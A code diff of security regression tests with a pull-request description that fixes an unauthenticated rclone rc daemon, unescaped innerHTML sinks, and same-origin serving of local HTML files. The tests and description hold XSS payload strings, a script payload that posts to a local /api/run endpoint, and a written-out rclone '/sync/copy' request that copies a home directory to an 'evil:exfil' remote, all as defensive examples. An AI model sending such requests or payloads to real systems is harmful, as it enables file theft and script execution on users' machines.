+        '<img src=x onerror=alert(1)>',            # element-text injection
+        'x" onmouseover="alert(1)',                # title="..." attribute break
+        "x' onmouseover='alert(1)",                # single-quoted attribute
+        '</span><script>alert(1)</script>',        # tag close then script
+        'a & b',                                   # ampersand stays a literal
+    ]
+    got = _run_esc(payloads, tmp_path)
+    for out in got:
+        assert "<" not in out and ">" not in out
+        assert '"' not in out and "'" not in out
+    assert got[0] == "&lt;img src=x onerror=alert(1)&gt;"
+    assert got[1] == "x&quot; onmouseover=&quot;alert(1)"
+    assert got[-1] == "a &amp; b"
+
+
+def test_esc_handles_null_and_undefined(tmp_path):
+    """Sinks pass optional fields straight through; esc must not print
+    "undefined" or throw."""
+    assert _run_esc([None], tmp_path) == [""]
+
+
+# ------------------------------------------------- the regression guard
+
+def _innerhtml_interpolations(src):
+    """Every `${...}` inside a statement that writes HTML, re-derived from the
+    source rather than listed, so a NEW sink is covered automatically."""
+    exprs = set()
+    for m in re.finditer(r"innerHTML\s*=|insertAdjacentHTML\(", src):
+        i, depth, instr = m.end(), 0, None
+        while i < len(src):
+            c = src[i]
+            if instr:
+                if c == "\\":
+                    i += 2
+                    continue
+                if c == instr:
+                    instr = None
+            elif c in "\"'`":
+                instr = c
+            elif c in "([{":
+                depth += 1
+            elif c in ")]}":
+                if depth == 0:
+                    break
+                depth -= 1
+            elif c == ";" and depth == 0:
+                break
+            i += 1
+        stmt = src[m.start():i]
+        exprs.update(e.strip() for e in
+                     re.findall(r"\$\{([^{}]*(?:\{[^{}]*\}[^{}]*)*)\}", stmt))
+    return exprs
+
+
+# Fragments that are safe WITHOUT esc() and why. Anything else interpolated
+# into HTML must go through esc().
+_SAFE = {
+    # Inline SVG/icon constants defined in this template.
+    "CHEV", "DOTS", "KIND_ICON.dir", "L.visible ? EYE : EYEOFF",
+    "anyVisible ? EYE : EYEOFF",
+    # Literal class-name / CSS switches — both branches are string literals.
+    'L.visible ? "" : "off"', 'anyVisible ? "" : "off"',
+    'collapsed ? "" : "open"',
+    'd.status === "error" ? "var(--bad)" : "var(--warn)"',
+    # Numbers and number formatters.
+    "members.length", "m.pct || 0", "m.count.toLocaleString()",
+    "st.bands", "st.width", "st.height", "d.timing_ms",
+    "fmt(st.p2 ?? st.min)", "fmt(st.p98 ?? st.max)",
+    "c.lat.toFixed(4)", "c.lng.toFixed(4)", "map.getZoom().toFixed(1)",
+    "e.lngLat.lat.toFixed(4)", "e.lngLat.lng.toFixed(4)",
+    "(i * 0.045).toFixed(2)", "(i * 0.08).toFixed(2)",
+    "(i * 0.08 + 0.05).toFixed(2)", "42 - i * 6", "64 - i * 9", "w",
+    # Locally generated markup / derived styles, no external string in them.
+    "gutter", "lines", "swatchStyle(L)", "cmapGradient(s.colormap||'viridis')",
+    "encodeURIComponent(q)",
+    # Backend enums and control labels: descriptor kinds and the literal
+    # strings the style dock passes to ctlShell ("Opacity", "Colormap", ...).
+    "m.phase", "st.dtype", "m.geometry_type || d.geometry_type || \"vector\"",
+    'preparing ? "tiles " + (L.mvt.pct || 0) + "%" : kindBadge(d)',
+    'm.count ? ` · ${m.count.toLocaleString()} features` : ""',
+    "label", 'valTxt||""',
+}
+
+
+def test_every_html_interpolation_is_escaped_or_a_known_constant():
+    unescaped = sorted(
+        e for e in _innerhtml_interpolations(_src())
+        if not e.startswith("esc(") and e not in _SAFE
+        and "esc(" not in e  # nested, e.g. the toast's optional <span>
+    )
+    assert not unescaped, (
+        "unescaped value(s) interpolated into innerHTML in the map template: "
+        f"{unescaped}. Wrap each in esc(), or — if it is genuinely a constant "
+        "or a number — add it to _SAFE with a note saying why."
+    )
+
+
+def test_the_known_untrusted_sinks_go_through_esc():
+    """Belt and braces on the specific sinks the review found, so a refactor
+    that reintroduces one is named in the failure rather than only counted."""
+    src = _src()
+    for needle in (
+        '<span class="nm">${esc(e.name)}</span>',            # directory listing
+        '<span class="lg-nm" title="${esc(groupKey)}">',     # group path (attr)
+        '<span class="lc-nm" title="${esc(tp)}">${esc(L.name)}</span>',
+        '<b>${esc(title)}</b>',                              # toast title
+        '${esc(String(msg).slice(0,300))}',                  # toast message
+        '<div class="g1">${esc(name)}</div>',                # geocoder result
+    ):
+        assert needle in src, f"map template no longer escapes: {needle}"

--- a/tests/test_mounts_rcd_auth.py
+++ b/tests/test_mounts_rcd_auth.py
@@ -1,0 +1,182 @@
+"""rcd rc-API authentication.
+
+The rclone rc daemon used to be spawned with --rc-no-auth, which left an
+unauthenticated filesystem API on a loopback port. Loopback is not a boundary
+against the browser: any page the user has open can POST to
+http://127.0.0.1:<port>/..., and because rclone merges URL query parameters
+into the rc call's arguments, a CORS-simple request (POST, text/plain, no
+custom header — so no preflight) drives it blind even though the reply is
+unreadable. /sync/copy?srcFs=$HOME&dstFs=evil:exfil is a working exfiltration
+primitive; /core/command exposes the whole rclone CLI. Same threat the
+tile-daemon token (D122) exists to close.
+
+So each daemon now mints a random secret and requires basic auth. These tests
+pin the properties that make that hold:
+  * the spawn never passes --rc-no-auth, and hands the secret over in the
+    ENVIRONMENT (not argv, where `ps` would show it to other local users);
+  * every rc call carries the Authorization header;
+  * the secret survives to another process via rcd.json and the registry;
+  * a daemon recorded WITHOUT a secret (spawned by an older build, still alive
+    across an upgrade) is still callable — no header, no breakage.
+"""
+import base64
+import json
+import os
+
+import pytest
+
+import fused_render.shell.mounts as mounts_mod
+
+
+@pytest.fixture()
+def home(tmp_path, monkeypatch):
+    home = tmp_path / "home"
+    monkeypatch.setenv("FUSED_RENDER_HOME", str(home))
+    return home
+
+
+@pytest.fixture(autouse=True)
+def _clear_auth_cache():
+    mounts_mod._forget_rcd_auth()
+    yield
+    mounts_mod._forget_rcd_auth()
+
+
+class _FakePopen:
+    """Captures the argv and env of the would-be rcd spawn."""
+
+    calls: list = []
+
+    def __init__(self, argv, **kw):
+        type(self).calls.append((argv, kw))
+
+
+@pytest.fixture
+def spawn(monkeypatch):
+    _FakePopen.calls = []
+    monkeypatch.setattr(mounts_mod, "rclone_bin", lambda: "/usr/bin/rclone")
+    monkeypatch.setattr(mounts_mod, "_live_rcd_port", lambda: None)  # force a spawn
+    monkeypatch.setattr(mounts_mod.subprocess, "Popen", _FakePopen)
+    seen = []
+
+    def fake_rc(port, method, params=None, timeout=30, auth=None):
+        seen.append({"port": port, "method": method, "auth": auth})
+        return {"pid": 999}
+
+    monkeypatch.setattr(mounts_mod, "_rc", fake_rc)
+    return _FakePopen.calls, seen
+
+
+# ---- spawn ------------------------------------------------------------------
+
+
+def test_spawn_does_not_disable_auth(home, spawn):
+    calls, _ = spawn
+    mounts_mod.ensure_rcd()
+    [(argv, _kw)] = calls
+    assert "--rc-no-auth" not in argv
+
+
+def test_secret_goes_in_the_env_not_argv(home, spawn):
+    """`ps` must not reveal it to other local users."""
+    calls, _ = spawn
+    mounts_mod.ensure_rcd()
+    [(argv, kw)] = calls
+    env = kw["env"]
+    secret = env["RCLONE_RC_PASS"]
+    assert env["RCLONE_RC_USER"] == mounts_mod._RCD_RC_USER
+    assert len(secret) >= 32  # token_urlsafe(32), not something guessable
+    assert not any(secret in a for a in argv)
+    assert env["PATH"] == os.environ["PATH"]  # inherits the rest of the env
+
+
+def test_each_daemon_gets_a_fresh_secret(home, spawn):
+    calls, _ = spawn
+    mounts_mod.ensure_rcd()
+    mounts_mod.ensure_rcd()
+    a, b = [kw["env"]["RCLONE_RC_PASS"] for _argv, kw in calls]
+    assert a != b
+
+
+def test_spawn_probe_authenticates_before_state_is_written(home, spawn):
+    """core/pid runs before rcd.json exists, so the spawn passes creds
+    explicitly rather than relying on the lookup."""
+    calls, seen = spawn
+    mounts_mod.ensure_rcd()
+    [(_argv, kw)] = calls
+    probe = next(c for c in seen if c["method"] == "core/pid")
+    assert probe["auth"] == (kw["env"]["RCLONE_RC_USER"],
+                             kw["env"]["RCLONE_RC_PASS"])
+
+
+def test_secret_is_recorded_for_other_processes(home, spawn):
+    """rcd is shared per-home and outlives the server, so a later process
+    reusing it must be able to authenticate."""
+    calls, _ = spawn
+    mounts_mod.ensure_rcd()
+    [(_argv, kw)] = calls
+    secret = kw["env"]["RCLONE_RC_PASS"]
+    state = json.load(open(mounts_mod._rcd_state_path()))
+    assert state["rc_pass"] == secret
+    # ...and in the central registry, which is how the reaper reaches a daemon
+    # whose own home dir (and rcd.json) is already gone.
+    reg = json.load(open(mounts_mod._rcd_registry_path()))
+    assert any(e.get("rc_pass") == secret for e in reg)
+    assert mounts_mod._rcd_auth(state["port"]) == (state["rc_user"], secret)
+
+
+# ---- the client side --------------------------------------------------------
+
+
+def _serve_once(handler_state):
+    """A one-shot loopback HTTP server that records the request it gets."""
+    import http.server
+    import threading
+
+    class H(http.server.BaseHTTPRequestHandler):
+        def do_POST(self):
+            handler_state["auth"] = self.headers.get("Authorization")
+            handler_state["path"] = self.path
+            body = b'{"pid": 4242}'
+            self.send_response(200)
+            self.send_header("Content-Type", "application/json")
+            self.send_header("Content-Length", str(len(body)))
+            self.end_headers()
+            self.wfile.write(body)
+
+        def log_message(self, *a):
+            pass
+
+    srv = http.server.HTTPServer(("127.0.0.1", 0), H)
+    threading.Thread(target=srv.handle_request, daemon=True).start()
+    return srv
+
+
+def test_rc_sends_basic_auth_from_recorded_state(home):
+    state = {}
+    srv = _serve_once(state)
+    port = srv.server_address[1]
+    mounts_mod.write_rcd_state(port, 4242, auth=("fused-render", "s3cr3t"))
+
+    assert mounts_mod._rc(port, "core/pid") == {"pid": 4242}
+    expect = base64.b64encode(b"fused-render:s3cr3t").decode()
+    assert state["auth"] == f"Basic {expect}"
+
+
+def test_rc_omits_auth_for_a_daemon_recorded_without_one(home):
+    """Back-compat: a pre-auth daemon still running across an upgrade keeps
+    working until it is replaced."""
+    state = {}
+    srv = _serve_once(state)
+    port = srv.server_address[1]
+    mounts_mod.write_rcd_state(port, 4242)  # no auth recorded
+
+    assert mounts_mod._rc(port, "core/pid") == {"pid": 4242}
+    assert state["auth"] is None
+
+
+def test_a_new_daemon_on_a_recycled_port_is_not_called_with_the_old_secret(home):
+    mounts_mod.write_rcd_state(5555, 1, auth=("fused-render", "old"))
+    assert mounts_mod._rcd_auth(5555) == ("fused-render", "old")
+    mounts_mod.write_rcd_state(5555, 2, auth=("fused-render", "new"))
+    assert mounts_mod._rcd_auth(5555) == ("fused-render", "new")

--- a/tests/test_mounts_rcd_auth.py
+++ b/tests/test_mounts_rcd_auth.py
@@ -83,6 +83,50 @@ def test_secret_goes_in_the_env_not_argv(home, spawn):
     assert env["PATH"] == os.environ["PATH"]  # inherits the rest of the env
 
 
+def test_inherited_rclone_rc_env_cannot_reconfigure_the_interface(
+        home, spawn, monkeypatch):
+    """rclone configures every flag from an env var named after it, so an
+    inherited RCLONE_RC_* can undo the lock-down — and merging our two keys
+    onto os.environ does not displace the others.
+
+    RCLONE_RC_ALLOW_ORIGIN is the one that bites (verified against v1.74.4):
+    it makes the daemon answer with `Access-Control-Allow-Origin: *` and
+    `Access-Control-Allow-Headers: Authorization`, so a foreign page can READ
+    replies — removing the read-blindness the loopback boundary otherwise
+    leaves intact. NO_AUTH and USER_FROM_HEADER happened not to beat an
+    explicit user/pass in that version, but that is version-dependent luck."""
+    for var in ("RCLONE_RC_NO_AUTH", "RCLONE_RC_ALLOW_ORIGIN",
+                "RCLONE_RC_USER_FROM_HEADER", "RCLONE_RC_HTPASSWD",
+                "RCLONE_RC_ADDR"):
+        monkeypatch.setenv(var, "hostile")
+    calls, _ = spawn
+    mounts_mod.ensure_rcd()
+    [(_argv, kw)] = calls
+    env = kw["env"]
+
+    assert env["RCLONE_RC_USER"] == mounts_mod._RCD_RC_USER
+    assert env["RCLONE_RC_PASS"] != "hostile"
+    assert env["RCLONE_RC_NO_AUTH"] == "false"  # pinned, not merely dropped
+    leaked = {k: v for k, v in env.items()
+              if k.startswith("RCLONE_RC_") and v == "hostile"}
+    assert not leaked, f"inherited rc config reached the daemon: {sorted(leaked)}"
+
+
+def test_unrelated_rclone_config_is_still_inherited(home, spawn, monkeypatch):
+    """Only the RC namespace is replaced. RCLONE_CONFIG and friends are the
+    user's real configuration for the remotes themselves — clearing those
+    would break every credentialed mount."""
+    monkeypatch.setenv("RCLONE_CONFIG", "/some/rclone.conf")
+    monkeypatch.setenv("RCLONE_CONFIG_PASS", "hunter2")
+    calls, _ = spawn
+    mounts_mod.ensure_rcd()
+    [(_argv, kw)] = calls
+
+    assert kw["env"]["RCLONE_CONFIG"] == "/some/rclone.conf"
+    assert kw["env"]["RCLONE_CONFIG_PASS"] == "hunter2"
+    assert kw["env"]["PATH"] == os.environ["PATH"]
+
+
 def test_each_daemon_gets_a_fresh_secret(home, spawn):
     calls, _ = spawn
     mounts_mod.ensure_rcd()

--- a/tests/test_mounts_rcd_auth.py
+++ b/tests/test_mounts_rcd_auth.py
@@ -35,13 +35,6 @@ def home(tmp_path, monkeypatch):
     return home
 
 
-@pytest.fixture(autouse=True)
-def _clear_auth_cache():
-    mounts_mod._forget_rcd_auth()
-    yield
-    mounts_mod._forget_rcd_auth()
-
-
 class _FakePopen:
     """Captures the argv and env of the would-be rcd spawn."""
 
@@ -176,7 +169,51 @@ def test_rc_omits_auth_for_a_daemon_recorded_without_one(home):
 
 
 def test_a_new_daemon_on_a_recycled_port_is_not_called_with_the_old_secret(home):
+    """rcd is shared per-home and outlives us, so ANOTHER process can replace
+    the daemon on a port with one holding a different secret. The lookup must
+    follow the state file rather than remember a per-port answer: pinning the
+    dead secret 401s every call, _live_rcd_port reads that as "no daemon", and
+    the spawn path starts a second rcd that nothing owns."""
     mounts_mod.write_rcd_state(5555, 1, auth=("fused-render", "old"))
     assert mounts_mod._rcd_auth(5555) == ("fused-render", "old")
+    # Same port, new pid, new secret — as if another process respawned it.
     mounts_mod.write_rcd_state(5555, 2, auth=("fused-render", "new"))
     assert mounts_mod._rcd_auth(5555) == ("fused-render", "new")
+
+
+def test_the_lookup_never_serves_a_secret_the_state_file_no_longer_has(home):
+    """The state file is the single source of truth. Anything remembered
+    across calls can outlive what it describes."""
+    mounts_mod.write_rcd_state(5556, 1, auth=("fused-render", "s1"))
+    assert mounts_mod._rcd_auth(5556) == ("fused-render", "s1")
+    # A daemon replaced by one with NO secret (a downgrade, or a pre-auth
+    # daemon adopted after ours died) must stop being called with the old one.
+    mounts_mod.write_rcd_state(5556, 2)
+    assert mounts_mod._rcd_auth(5556) is None
+
+
+def test_concurrent_state_writes_never_pin_a_stale_secret(home):
+    """A reader racing a writer must not be able to publish the pre-write
+    secret after the write lands — the failure mode a read-then-fill cache
+    has, and the reason there is no cache."""
+    import threading
+
+    mounts_mod.write_rcd_state(5557, 1, auth=("fused-render", "gen0"))
+    stop = threading.Event()
+    seen = []
+
+    def reader():
+        while not stop.is_set():
+            seen.append(mounts_mod._rcd_auth(5557))
+
+    t = threading.Thread(target=reader, daemon=True)
+    t.start()
+    for i in range(1, 40):
+        mounts_mod.write_rcd_state(5557, i, auth=("fused-render", f"gen{i}"))
+    stop.set()
+    t.join(timeout=10)
+
+    # Every observation must be a real generation (or None mid-write), and the
+    # settled value must be the last one written — never an earlier one.
+    assert mounts_mod._rcd_auth(5557) == ("fused-render", "gen39")
+    assert all(s is None or s[1].startswith("gen") for s in seen)

--- a/tests/test_server_fs_raw_hardening.py
+++ b/tests/test_server_fs_raw_hardening.py
@@ -1,0 +1,196 @@
+"""/api/fs/raw must not hand a page the app's own origin.
+
+The route serves any absolute path with a content-type guessed from its name,
+as a plain GET with no X-Fused — so it is top-level navigable, and navigation
+is not subject to CORS. A foreign site can point the browser at a .html file it
+arranged to be on disk (a drive-by download into ~/Downloads names the file for
+it) and that file then runs as a FIRST-PARTY document on 127.0.0.1:<port>,
+inside the trust boundary, free to send X-Fused: 1 to /api/run.
+
+D4 concedes that an .html file *you open* runs same-origin — that is the user
+choosing the file. Here the attacker chooses it.
+
+So: nosniff always, and scriptable types downgraded to text/plain when (and
+only when) the request is a document load. The route has four exits — HEAD, the
+307 to the store, the proxied mount read, and the local file — and three of
+them can carry a scriptable type, so each is covered here; the mount-backed
+proxy in particular is the one a fix aimed only at the local FileResponse
+would miss.
+"""
+import json
+import os
+import threading
+from http.server import BaseHTTPRequestHandler, HTTPServer
+
+import pytest
+from fastapi.testclient import TestClient
+
+import fused_render.shell.mounts as shell_mounts
+import fused_render.shell.prefetch as shell_prefetch
+from fused_render.server import create_app
+
+
+NAV = {"sec-fetch-dest": "document", "sec-fetch-mode": "navigate"}
+SUBRESOURCE = {"sec-fetch-dest": "empty", "sec-fetch-mode": "cors"}
+
+HTML = "<script>fetch('/api/run',{method:'POST',headers:{'X-Fused':'1'}})</script>"
+SVG = '<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>'
+
+
+@pytest.fixture()
+def client(tmp_path, monkeypatch):
+    monkeypatch.setenv("FUSED_RENDER_HOME", str(tmp_path / "home"))
+    return TestClient(create_app(start_dir=str(tmp_path)))
+
+
+def _write(tmp_path, name, body):
+    p = tmp_path / name
+    p.write_text(body, encoding="utf-8")
+    return str(p)
+
+
+def _ctype(resp):
+    return resp.headers.get("content-type", "").split(";")[0].strip().lower()
+
+
+# ---------------------------------------------------------- the local file
+
+def test_navigating_to_a_local_html_file_does_not_get_a_document(client, tmp_path):
+    """The attack: window.open('.../api/fs/raw?path=/…/evil.html')."""
+    p = _write(tmp_path, "evil.html", HTML)
+    r = client.get("/api/fs/raw", params={"path": p}, headers=NAV)
+
+    assert r.status_code == 200
+    assert _ctype(r) == "text/plain"
+    assert r.headers["x-content-type-options"] == "nosniff"
+    assert r.text == HTML  # the bytes are untouched; only the framing changes
+
+
+def test_the_same_file_as_a_subresource_keeps_its_type(client, tmp_path):
+    """Templates fetch this endpoint as data. Coercing there would break
+    working callers to fix a threat that only exists for document loads."""
+    p = _write(tmp_path, "page.html", HTML)
+    r = client.get("/api/fs/raw", params={"path": p}, headers=SUBRESOURCE)
+
+    assert _ctype(r) == "text/html"
+    assert r.headers["x-content-type-options"] == "nosniff"
+
+
+def test_an_svg_in_an_img_tag_is_left_alone(client, tmp_path):
+    """SVG in <img> cannot execute script — and the shell really does load
+    template icons this way (ModeSwitcher's CSS mask). Pins the coercion
+    against being widened to every request."""
+    p = _write(tmp_path, "icon.svg", SVG)
+    r = client.get("/api/fs/raw", params={"path": p},
+                   headers={"sec-fetch-dest": "image", "sec-fetch-mode": "no-cors"})
+
+    assert _ctype(r) == "image/svg+xml"
+
+
+@pytest.mark.parametrize("dest", ["document", "iframe", "frame", "embed", "object"])
+def test_every_document_destination_is_covered(client, tmp_path, dest):
+    """Framing is the same capability as navigating: the framed document lands
+    on this origin either way."""
+    p = _write(tmp_path, "f.html", HTML)
+    r = client.get("/api/fs/raw", params={"path": p},
+                   headers={"sec-fetch-dest": dest})
+    assert _ctype(r) == "text/plain"
+
+
+def test_svg_navigated_is_coerced(client, tmp_path):
+    """Script inside an SVG *does* run when the SVG is the document."""
+    p = _write(tmp_path, "x.svg", SVG)
+    assert _ctype(client.get("/api/fs/raw", params={"path": p},
+                             headers=NAV)) == "text/plain"
+
+
+def test_non_scriptable_types_keep_their_content_type(client, tmp_path):
+    """Only the executable types are downgraded — a navigated .json or .csv
+    must still describe itself honestly."""
+    p = _write(tmp_path, "d.json", '{"a":1}')
+    r = client.get("/api/fs/raw", params={"path": p}, headers=NAV)
+
+    assert _ctype(r) == "application/json"
+    assert r.headers["x-content-type-options"] == "nosniff"
+
+
+def test_head_is_hardened_too(client, tmp_path):
+    """Ranged clients probe with HEAD first, and it has its own response path
+    with its own guess_type call."""
+    p = _write(tmp_path, "h.html", HTML)
+    r = client.head("/api/fs/raw", params={"path": p}, headers=NAV)
+
+    assert r.status_code == 200
+    assert _ctype(r) == "text/plain"
+    assert r.headers["x-content-type-options"] == "nosniff"
+
+
+def test_a_missing_file_still_404s(client, tmp_path):
+    """The wrapper must not change the route's error behaviour."""
+    r = client.get("/api/fs/raw", params={"path": str(tmp_path / "nope.html")},
+                   headers=NAV)
+    assert r.status_code == 404
+
+
+# ------------------------------------------------- the mount-backed proxy
+
+@pytest.fixture()
+def stub_serve():
+    """Stands in for a mount's rclone `serve http`, which answers with its own
+    content-type — the header the proxy forwards via _PROXY_HEADERS."""
+    class H(BaseHTTPRequestHandler):
+        def log_message(self, *a):
+            pass
+
+        def do_GET(self):
+            body = HTML.encode()
+            self.send_response(200)
+            self.send_header("Content-Type", "text/html")
+            self.send_header("Content-Length", str(len(body)))
+            self.end_headers()
+            self.wfile.write(body)
+
+    srv = HTTPServer(("127.0.0.1", 0), H)
+    threading.Thread(target=srv.serve_forever, daemon=True).start()
+    yield f"http://127.0.0.1:{srv.server_address[1]}"
+    srv.shutdown()
+
+
+def test_a_proxied_mount_read_is_hardened(client, tmp_path, stub_serve,
+                                          monkeypatch):
+    """The exit a fix aimed at the local FileResponse would miss: bytes coming
+    back from rclone serve carry ITS content-type straight through the proxy,
+    so an .html in a mounted bucket is just as navigable."""
+    p = _write(tmp_path, "in_bucket.html", HTML)
+    monkeypatch.setattr(shell_mounts, "serve_url_for", lambda path: stub_serve)
+    # Warm, so the read is proxied rather than 307'd to the store.
+    monkeypatch.setattr(shell_prefetch, "is_done", lambda path: True)
+    monkeypatch.setattr(shell_prefetch, "schedule", lambda *a, **k: None)
+
+    r = client.get("/api/fs/raw", params={"path": p}, headers=NAV)
+
+    assert r.status_code == 200
+    assert r.text == HTML          # really came from the stub serve
+    assert _ctype(r) == "text/plain"
+    assert r.headers["x-content-type-options"] == "nosniff"
+
+
+def test_the_307_to_the_object_store_is_untouched(client, tmp_path, stub_serve,
+                                                  monkeypatch):
+    """The redirect points at a foreign origin (S3/GCS) and is already gated to
+    non-browser clients, so it is out of scope — and rewriting a redirect's
+    headers would be meddling with a path the readers depend on."""
+    p = _write(tmp_path, "big.parquet", "x")
+    monkeypatch.setattr(shell_mounts, "serve_url_for", lambda path: stub_serve)
+    monkeypatch.setattr(shell_mounts, "upstream_url_for",
+                        lambda path: "https://store.example/signed")
+    monkeypatch.setattr(shell_prefetch, "is_done", lambda path: False)
+    monkeypatch.setattr(shell_prefetch, "schedule", lambda *a, **k: None)
+
+    # No Sec-Fetch-* at all: that absence is how the route recognises a native
+    # ranged client (duckdb httpfs) rather than a browser.
+    r = client.get("/api/fs/raw", params={"path": p}, follow_redirects=False)
+
+    assert r.status_code == 307
+    assert r.headers["location"] == "https://store.example/signed"
+    assert "x-content-type-options" not in r.headers


### PR DESCRIPTION
Two findings from a security review of the whole app. Both concern boundaries `SECURITY.md` says are meant to hold, not the local filesystem / code-execution access that is the intended design.

## 1. The rclone rc daemon was unauthenticated (HIGH)

`shell/mounts.py` spawned `rclone rcd` with `--rc-no-auth`, leaving a full filesystem API on a loopback port with no secret of any kind. Loopback is not a boundary against the browser — `SECURITY.md` says exactly that in the rationale for the tile-daemon token (D122): *"a malicious page open in the same browser can fetch `http://127.0.0.1:<port>/...`"*. rcd, with a far bigger API, had no equivalent guard.

rclone merges URL query parameters into the rc call's arguments, so a **CORS-simple** request — POST, `text/plain`, no custom header, therefore **no preflight** — is enough to drive it blind, even though the reply is unreadable cross-origin:

```
POST http://127.0.0.1:<port>/sync/copy?srcFs=/Users/you&dstFs=evil:exfil
```

Verified against the real binary: that call **actually copied a file**. `/core/command` exposes the whole rclone CLI. Read-blindness costs the attacker nothing — `config/create` + `sync/copy` are fire-and-forget. The random port is not a secret a 16-bit spray can't find, and `run_automount` brings the daemon up at startup, so anyone with a saved mount is exposed for the whole session.

**Fix.** Each daemon mints a random secret at spawn and requires HTTP basic auth, mirroring D122. The secret is passed to the child in the **environment** (`RCLONE_RC_USER`/`RCLONE_RC_PASS`), never on argv, so it is not visible in `ps` to other local users. It is recorded in `rcd.json` and in the central registry, so another process reusing the shared daemon — and `reap_stale_rcd`, probing a daemon whose own home dir is gone — can still authenticate.

Verified end to end against the installed rclone:

```
authenticated core/pid ->                              {'pid': 52822}
cross-origin-style unauthenticated core/command ->     401 Unauthorized
secret visible in ps:                                  False
```

**Back-compat:** a daemon recorded without a secret (spawned by an older build, still alive across an upgrade) is called without the header, so it keeps working until it is replaced.

## 2. Untrusted strings interpolated into `innerHTML` in the map template (MEDIUM)

D3/D4 concede that there is no sanitization for the *content of a file you chose to open*. That does not cover strings that arrive incidentally and land in the template's own chrome:

- `?dir=` and `?open=` are read at boot (`template.html:1407-1424`), so a crafted link to the app's **own built-in template** is reflected XSS with **no click**;
- `discover.py:120` returns `f"Not a directory: {base}"`, echoing `?dir=` straight back — and the toast rendered `msg` as markup (`title` had no length cap at all);
- filenames and absolute paths from a listing (a shared folder, an unzipped archive or a mounted bucket can name an entry anything, and a `"` in a path breaks out of `title="..."`), GPKG/KML sub-layer names, and third-party geocoder results all reached the same sinks.

Injected script here is same-origin with the shell, so it can set `X-Fused: 1` and reach `POST /api/run` — walking around the D36 guard rather than breaking it.

**Fix.** Added an `esc()` helper and applied it at every such sink: the directory row, the layer/group cards (text *and* the `title` attribute), the style-panel and code-viewer messages, the geocoder results, and the toast.

## Tests

New `tests/test_mounts_rcd_auth.py` and `tests/test_map_template_escaping.py`:

- the spawn never passes `--rc-no-auth`, keeps the secret off argv, mints a fresh one per daemon, authenticates the pre-state `core/pid` probe, and records the secret for other processes;
- every rc call carries the `Authorization` header; a daemon with no recorded secret is still callable; a recycled port doesn't reuse a stale secret;
- the template's **real** `esc` runs under node (the `_js_block` approach of `test_calls.py`), and a regression guard **re-derives** every `${...}` reaching an `innerHTML` sink from the source and fails on a new one that is neither escaped nor a known constant — so the next unescaped sink fails CI rather than shipping. Mutation-checked: removing one `esc()` fails both guards.

Full suite: 2074 passed. The 3 failures on this branch (`test_deploy.py` x2, `test_calls.py` x1) reproduce identically on a clean `main` and are unrelated.

🤖 Generated with [Claude Code](https://claude.com/claude-code)


<!-- CURSOR_SUMMARY -->
---

> [!NOTE]
> **High Risk**
> Touches authentication on the mount control plane, response framing on a path that can reach `/api/run`, and XSS sinks in same-origin shell UI—high-impact security surface even though changes are defensive.
> 
> **Overview**
> Closes three **browser-boundary** gaps called out in `SECURITY.md`: unauthenticated loopback APIs and same-origin script injection in built-in chrome.
> 
> **rclone `rcd`** no longer starts with `--rc-no-auth`. Each daemon gets a random HTTP basic-auth secret via `RCLONE_RC_USER`/`RCLONE_RC_PASS` in the child environment (not argv), stored in `rcd.json` and the central registry; `_rc` sends `Authorization` on every rc call, with back-compat when no secret is recorded. Spawn replaces the inherited `RCLONE_RC_*` env namespace so flags like `RCLONE_RC_ALLOW_ORIGIN` cannot reopen CORS-readable replies.
> 
> **`/api/fs/raw`** routes all GET/HEAD responses through `_harden_raw`: always `X-Content-Type-Options: nosniff`, and for document/frame navigations (`Sec-Fetch-Dest` / `navigate`), scriptable types (`text/html`, XHTML, SVG) are served as `text/plain` so a foreign site cannot navigate local HTML onto the app origin; subresource reads and 307 redirects are unchanged.
> 
> **Map template** adds `esc()` and wraps untrusted strings (listings, layer names, URL params, errors, geocoder hits, toasts) before `innerHTML`, so incidental data cannot bypass the `X-Fused` guard via reflected XSS.
> 
> New tests cover rcd spawn/auth, raw hardening (local + proxied mount), and template escaping regression guards.
> 
> <sup>Reviewed by [Cursor Bugbot](https://cursor.com/bugbot) for commit ddd611f5e3a866c80579ee9a96402a96e0308224. Bugbot is set up for automated code reviews on this repo. Configure [here](https://www.cursor.com/dashboard/bugbot).</sup>
<!-- /CURSOR_SUMMARY -->